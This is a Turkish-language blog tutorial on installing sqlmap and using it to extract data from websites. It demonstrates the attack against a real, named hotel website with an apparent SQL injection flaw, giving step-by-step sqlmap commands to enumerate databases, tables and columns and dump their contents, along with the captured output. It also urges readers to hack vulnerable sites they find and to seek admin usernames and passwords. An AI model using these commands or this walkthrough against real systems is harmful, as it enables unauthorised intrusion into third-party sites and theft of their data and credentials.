Sqlmap Nedir ? Nasıl Kullanılır ?

Sqlmap Nedir ? 

Sqlmap python dili kullanılarak yazılan , veritabanı açığını sömürerek veritabanı bilgilerini dump eden bir çeşit hack aracıdır. Genel de herkes tarafından bilinen ama gerektiği ilgiyi görmeyen bir araçtır. Aslında sqlmapi derinlemesine bilirseniz , tüm parametrelerini filan bir de işin mantığını kavradıktan sonra ne kadar büyük bir nimet olduğunu anlarsınız. Çok Fazla uzatmak istemiyorum bu yazıda basitçe kurulumdan ve kullanımdan bahsedeceğim ardından ileri ki zamanlarda derinlemesine sqlmap konusunu işleyeceğiz derinlemesine sqlmap konusunu açınca bu konunun altında da paylaşırım arkadaşlar. Neyse isterseniz şimdi nasıl kullanacağımıza geçelim 🙂

Öncelikle bu aracı hem windows üzerinde hem de linux üzerinde kurma imkanımız var benim tavsiyem bilişime merakınız varsa ve bu alanda ilerlemek istiyorsanız işletim sisteminizi linux dağıtımlı bir işletim sistemini çevirmelisiniz. Bu sizin için daha rahat olur. Çünkü linux tabanlı işletim sistemlerinde sqlmap,nmap,nikto vb araçlar oto kurulu olarak geliyor, Tavsiye ettiğim linux dağılımı; Kali linux ya da Parrot. Kurulumlardan ilk başta Windows kurulumunu anlatacağım.

-Windows Kurulumu

Anlatıma geçmeden önce windows kurulumu için harici 1 şey daha gerekli oda sqlmap’in yazıldığı dil olan python kurulumu. Sqlmap’i Windows üzerinde çalıştırmak için python 2.7 ye ihtiyacımız var telaşlanmayın ben sizin için hem python hem de sqlmap indirme linklerini vericem 🙂 Bu arada windows kurulumu biraz uzun sürebilir yani karmaşık gelebilir ama öyle değil dikkatlice okuyun yazdıklarımı sabırlı olun 🙂

Python İndirme Linki; https://www.python.org/ftp/python/2.7.18/python-2.7.18.msi

Sqlmap İndirme Linki; http://sqlmap.org/

Yukarıda Verdiğim Dosyaları indirdikten sonra önce pythonu kurun. Pythonu kurmak için inen “python-2.7.18.msi” dosyasını yönetici olarak çalıştırın. Hiçbir Ayarına dokunmadan default şekilde next>next>next ile kurulumu tamamlayın. Kurulum tamamlanınca Bilgisayarım>C>Python27 Diye bir klasör oluşacak. Şimdi İndirdiğiniz sqlmap dosyası olan”sqlmapproject-sqlmap-1.1.9-19.rar” Olan bu dosyayı masaüstüne atıp sağ tıklayın klasöre çıkart diyin. Sonra çıkarttığınız klasöre girin içinde bir klasör daha olacak o klasöre sağ tıklayarak yeniden adlandır diyin ve yeni ismini “sqlmap” yapın. Daha sonra o sqlmap klasörünü alın “C:\” Dizininde oluşan Python27 Klasörünün içine kopyalayın her şey bu kadar.

Şimdi tek yapmanız gereken masaüstüne gelip sağ tıklayıp Yeni>Kısayol oluştura tıklamak. Açılan kutucuğa cmd yazın öğe adını “sqlmap” yazın ve daha sonra masaüstüne bir kısayol oluşacak ona sağ tıklayın ve başlama yerine gelip sqlmapin konumunu yazın yani “C:\Python27\sqlmap” bunu da yazdıktan sonra her şey tamam kurulum aşaması bitmiş demektir. Hemen kısayola normal 2 defa tıklayın açılsın sonra açılınca “sqlmap.py” Yazıp enterlayın eğer karşınıza;

Bu Gelirse Windowsa Sqlmap Kurma İşlemini Başarıyla tamamladınız şimdi gelelim nasıl kullanacağımıza. Kurulumda sıkıntı yaşayan olursa buraya yorum atsın yardımcı olayım.

-Windows Kullanımı

Kullanıma başlamadan önce bir web sitesine ihtiyacımız var üzerinde tarama yapabileceğimiz kobay bir bir siteye ihtiyacımız var, ben bunu daha önceden buldum o yüzden direk o site üzerinden işlemleri yapacağım. Sizler de açıklı siteleriniz mevcutsa sqlmap yardımı ile verilerini hackleyebilirsiniz.

Ben Anlatım için http://www.monhotel.it/include/eventi_mwc_dettaglio.php?id=9 Bu Siteyi Kullanacağım siteye girdiğinizde mysql hatasını kolayca görebilirsiniz.

Şimdi masaüstüne oluşturduğumuz kısayola tıklayarak sqlmapi çalıştırın. ve şu komutları girin

sqlmap.py -u http://www.monhotel.it/include/eventi_mwc_dettaglio.php?id=9 –dbs

Bu kod dizisini size açıklayayım 🙂 sqlmap.py sqlmap’in çalışmasını tetikleyen komuttur. ondan sonraki “-u” komutu url anlamına gelir, yani o koddan sonra site url sini yazmalısınız. En sonraki “–dbs” ise sitenin veritabanına erişmek için kullanılan bir parametredir. Bu yazımda Sadece –dbs parametresi ile anlatacağım, ileride derinlemesine sqlmap kullanımı adında bir konu açacağım o zaman orada -tamper , –ignore-proxy , –roles, –password ……. Ve daha onlarca parametreyi anlatacağım. Tabi ileride şuanlık ilk seviyede anlatım yapıyorum. Neyse fazla dağıtmadan devam edelim.

Bir önceki kod bloğundan sonra size veritabanı isimleri gelecek, tabi sizin veritabanı çekmek istediğiniz sitede gelmeyebilir onun için farklı farklı parametreler gerekebilir, Benim kullandığım sitede iki adet veritabanı geldi, sizde gelmeyebilir araçta bı sıkıntı yok yani tamamen sitenin firewallı ile alakalı ya da başka bir nedenden dolayı veritabanını çekmemişsinizdir, Belki de uygun açığı bulamadınız neyse birçok sebep var yani veritabanı gelmemesi için bende 2 tane geldi, uzatmadan devam edelim.

available databases [2]:
[*] 22802208_1
[*] information_schema

Şimdi buradaki “information_schema” gereksizdir yani o veritabanı ile işimiz yok, zaten hemen hemen her sitenin veritabanı bilgilerinde o gelir onu kale almayın sizin işinize yarayacak olan veritabanı “22802208_1” Bu veritabanıdır, İşleme bu veritabanı üzerinden devam edeceğim. Sonraki Kod;

sqlmap.py -u http://www.monhotel.it/include/eventi_mwc_dettaglio.php?id=9 -D 22802208_1 –tables

Bu kod bloğunu açıklamak gerekirse, -D Parametresi ile kullancağımız Veritabanının adını belirliyoruz, Daha sonra Veritabanı adını yazıyoruz, En sonra “–tables” Komutu ile veritabanında ki tabloları çekmeye başlıyoruz.

Database: 22802208_1
[13 tables]
+————————-+
| eventi                            |
| eventi_foto                  |
| eventi_mwc                 |
| eventi_mwc_foto       |
| guestbook                     |
| lastminutes                  |
| lastminutes_foto        |
| news                              |
| news_foto                     |
| offerte                            |
| offerte_foto                  |
| photogallery                 |
| photogallery_gruppo |
+————————-+

Evet bi önceki kodumuzdan sonra seçtiğimiz veritabanında ki tablolar geldi, toplam 13 adet tablo geldi Şimdi bunların arasında admin giriş bilgileri olan bir tablo olması gerekiyor, çünkü siteyi hacklemek için ya da başka bir faaliyet(amacınız) için admin bilgilerini dump(indirmek,elde etmek) etmemiz lazım. O yüzden tek tek tabloları açıp bakmanız gerekebilir, ama bazı sitelerde genelde admin adında bir tablo olur onu direk dump ederek admin bilgilerine erişebilirsiniz. Bu sitede admin bilgileri çıkmadı, ama sizin için varsayalım ki eventi tablosu admin olsun. hemen devam edelim, Sıradaki kodumuz

sqlmap.py -u http://www.monhotel.it/include/eventi_mwc_dettaglio.php?id=9 -D 22802208_1 -T eventi –columns

Bu kod bloğunda ise veritabanını belirleyip tablo bilgilerini çektikten sonra gelen tablolardan istediğimizi yazıp ardından “–columns” parametresi ile istediğimiz tabloyu çekme işlemine başlıyoruz.

+———————+——————–+
| Column                  |      Type                  |
+——————–+———————+
| eventi_id               | int(10) unsigned |
| eventi_luogo        | varchar(100)        |
| eventi_periodo    | varchar(100)        |
| eventi_testo         | blob                        |
| eventi_testo_de  | blob                        |
| eventi_testo_en  | blob                        |
| eventi_testo_fr   | blob                        |
| eventi_titolo        | varchar(150)         |
| eventi_titolo_de | varchar(150)         |
| eventi_titolo_en | varchar(150)         |
| eventi_titolo_fr  | varchar(150)          |
| file                          | text                          |
+——————+———————–+

Eventi tablosunun içinde ki sütünlar geldi. Şimdi iki blok var yukarda “Column” ve “Type” siz sadece columnu dikkate alın. Şuana kadar gelidiğimiz yerleri toparlarsak veritabanı öğrendik, öğrendiğimiz veritabanının tablolarını çektik o tabloların sütünlarını çektik. Şimdi burada baya bi sütün var tabi burası admin bilgilerinin olduğu yer değil, çünkü sitede admin bilgileri yok biz eventi tablosunu çektik. Ama eğer admin tablosu çıksaydı genelde içinden çıkacak sütünlar temel olarak şöyle olur

+—————+——————–+
| Column           |      Type                |
+—————+——————–+
| admin_id      | int(10) unsigned |
| username      | varchar(100)       |
| password       | varchar(100)       |
+—————+——————–+

Şimdi son işlem olarak gelen sütünlarda ki bilgileri almaya geldi bunun için de tek yapmanız gereken;

sqlmap.py -u http://www.monhotel.it/include/eventi_mwc_dettaglio.php?id=9 -D 22802208_1 -T eventi -C sütün_adı_1,sütün_adı_2,sütün_adı_3 –dump

Bu şekildedir, farz edelim admin tablosunun sütünlerını dump edeceksiniz kod bu şekilde olmalıdır kodu yukarıda veridiğim örnek admin sütününa göre yazıyorum.

sqlmap.py -u http://www.monhotel.it/include/eventi_mwc_dettaglio.php?id=9 -D 22802208_1 -T eventi -C admin_id,username,password –dump

Bu kadar bu kodu yazıp enterladığınızda sonucu rahatlıkla almış olacaksınız. Ben eventi tablosunun sütünlarını dump ettim onun da kodlarını atayım, Benden bu kadar arkadaşlar bu formatta açık bulduğunuz sitelerin veritabanını çekebilirsiniz.

Not: İllaki bütün sütünları çekmek zorunda değilsiniz işinize yarayanı çekmeniz yeterlidir.

Eventi tablo sütün dump kodu;

http://www.monhotel.it/include/eventi_mwc_dettaglio.php?id=9 -D 22802208_1 -T eventi -C eventi_id,eventi_luogo,eventi_periodo –dump

Kodun çıktısında da bilgiler gelecektir o kadar kendinize iyi bakın esenlikler dilerim…